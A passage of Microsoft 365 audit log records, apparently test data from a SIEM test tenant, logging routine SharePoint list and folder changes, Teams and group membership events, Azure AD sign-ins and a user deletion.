istBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:17","Id":"8f586afb-1438-475e-a4d5-08d8c9b5937d","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:00","Id":"9b9e973b-64c3-4607-bc79-bf743c985051","Operation":"TeamCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":25,"UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":2,"Version":1,"Workload":"MicrosoftTeams","UserId":"root@testsiem4.onmicrosoft.com","TeamGuid":"19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2","TeamName":"users"} +{"CreationTime":"2021-02-05T09:07:58","Id":"f16cc0cc-2a18-580e-83c5-04d3c385ebb8","Operation":"MemberAdded","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":25,"UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"MicrosoftTeams","UserId":"root@testsiem4.onmicrosoft.com","AADGroupId":"61b6d6f5-7aa0-437b-a967-fbcd39ec90a1","CommunicationType":"Team","Members":[{"DisplayName":"Adrian Serrano","Role":2,"UPN":"admin@testsiem4.onmicrosoft.com"},{"DisplayName":"Eve","Role":2,"UPN":"eve@testsiem4.onmicrosoft.com"}],"TeamGuid":"19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2","ItemName":"users","TeamName":"users"} +{"CreationTime":"2021-02-05T09:08:13","Id":"6454a7d9-afae-4a6c-ffa5-08d8c9b5911c","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-5054-2000-9ced-83aa1cf560fd","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:12","Id":"6d69552c-2019-4f7c-92bc-08d8c9b5908b","Operation":"FolderCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":6,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/Shared Documents\/General","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-b01b-2000-9ced-879789d2d8e5","EventSource":"SharePoint","ItemType":"Folder","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","ListItemUniqueId":"81d4cd08-7ffb-45d2-a422-86a9a9335d66","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","SourceFileExtension":"","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/","SourceFileName":"General","SourceRelativeUrl":"Shared Documents"} +{"CreationTime":"2021-02-05T09:07:57","Id":"6e9fc7e0-158a-4456-2a89-08d8c9b58771","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"Everyone except external users"} +{"CreationTime":"2021-02-05T09:07:56","Id":"a9b8277d-d3b9-4d99-0491-08d8c9b5874b","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} +{"CreationTime":"2021-02-05T09:07:56","Id":"dfef0880-e895-47e1-2e39-08d8c9b58733","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"} +{"CreationTime":"2021-02-05T09:07:56","Id":"d9b6f410-30c7-42a0-0820-08d8c9b5872c","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Members"} +{"CreationTime":"2021-02-05T09:07:56","Id":"5c82c14e-525e-44f4-7cd7-08d8c9b58722","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} +{"CreationTime":"2021-02-05T09:07:56","Id":"f576a30e-1734-4f42-f3b3-08d8c9b58718","Operation":"SiteCollectionCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":4,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"20.190.143.50","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","ApplicationDisplayName":"Microsoft Graph","ApplicationId":"00000006-0000-0ff1-ce00-000000000000","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Site","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","EventData":"O365AdminCenter<\/SiteCreationSource>True<\/TenantSettings.ShowCreateSiteCommand>False<\/TenantSettings.UseCustomSiteCreationForm>"} +{"CreationTime":"2021-02-05T09:07:56","Id":"f84f38b0-1963-4a1d-454e-08d8c9b586e9","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"} +{"CreationTime":"2021-02-05T09:07:55","Id":"e85ec350-af23-47a7-5b33-08d8c9b586be","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} +{"CreationTime":"2021-02-05T09:08:14","Id":"32474de1-fca7-4d81-4f97-08d8c9b591a4","Operation":"ListUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":0,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:14","Id":"20b7fc96-6e31-437a-50fa-08d8c9b59185","Operation":"ListCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/SiteAssets","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","ListBaseTemplateType":"DocumentLibrary","ListBaseType":"DocumentLibrary","ListTitle":"96CDFC22-2B86-49EA-B4E9-F11888B1665D"} +{"CreationTime":"2021-02-05T09:08:17","Id":"3813eef0-90e1-4758-54d8-08d8c9b5938e","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:17","Id":"597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:17","Id":"f4579e76-fb4b-4434-904e-08d8c9b59389","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} +{"CreationTime":"2021-02-05T09:08:17","Id":"b401dd51-f4a2-477f-cc42-08d8c9b59384","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/03e45e84-1992-4d42-9116-26f756012634","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:17","Id":"073f437c-2e04-441a-05ad-08d8c9b59380","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/0c5e0085-eb30-494b-9cdd-ece1d3c649a2","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:17","Id":"8f586afb-1438-475e-a4d5-08d8c9b5937d","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"51.141.50.227","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/39360f11-34cf-4356-9945-25c44e68dade","UserId":"app@sharepoint","ApplicationDisplayName":"OneNote","ApplicationId":"2d4d3d8e-2be3-4bef-9f87-7875a61c29de","CorrelationId":"fd39a89f-9050-2000-7abb-ce79fabfa6c0","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"onenoteapi","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"} +{"CreationTime":"2021-02-05T09:06:08","Id":"a2b50af0-f77d-4bbf-b30b-d3b2eea07300","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"5f09333a-842c-47da-a157-57da27fcbca5","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"f987e734-9f74-4996-8d75-6da73a443d22","IntraSystemId":"a2b50af0-f77d-4bbf-b30b-d3b2eea07300","SupportTicketId":"","Target":[{"ID":"5f09333a-842c-47da-a157-57da27fcbca5","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"} +{"CreationTime":"2021-02-05T09:06:34","Id":"5532155c-11e4-4628-95e7-6c1ddb0d6f00","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"5f09333a-842c-47da-a157-57da27fcbca5","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"e5e06ef9-0ea6-4a1e-82e2-b82d83ec68a1","IntraSystemId":"5532155c-11e4-4628-95e7-6c1ddb0d6f00","SupportTicketId":"","Target":[{"ID":"5f09333a-842c-47da-a157-57da27fcbca5","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"} +{"CreationTime":"2021-02-05T09:06:07","Id":"f3bc8508-1130-4d82-b7c7-4c1292b98600","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"79.159.11.115","ObjectId":"00000002-0000-0ff1-ce00-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"79.159.11.115","InterSystemsId":"17b096b5-881a-4d72-8268-4854f9aa8910","IntraSystemId":"f3bc8508-1130-4d82-b7c7-4c1292b98600","SupportTicketId":"","Target":[{"ID":"00000002-0000-0ff1-ce00-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"00000002-0000-0ff1-ce00-000000000000","ErrorNumber":"0"} +{"CreationTime":"2021-02-04T16:33:17","Id":"1947bd7a-5b96-4bd5-931b-c12cc6ffdfcd","Operation":"Delete user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Is Hard 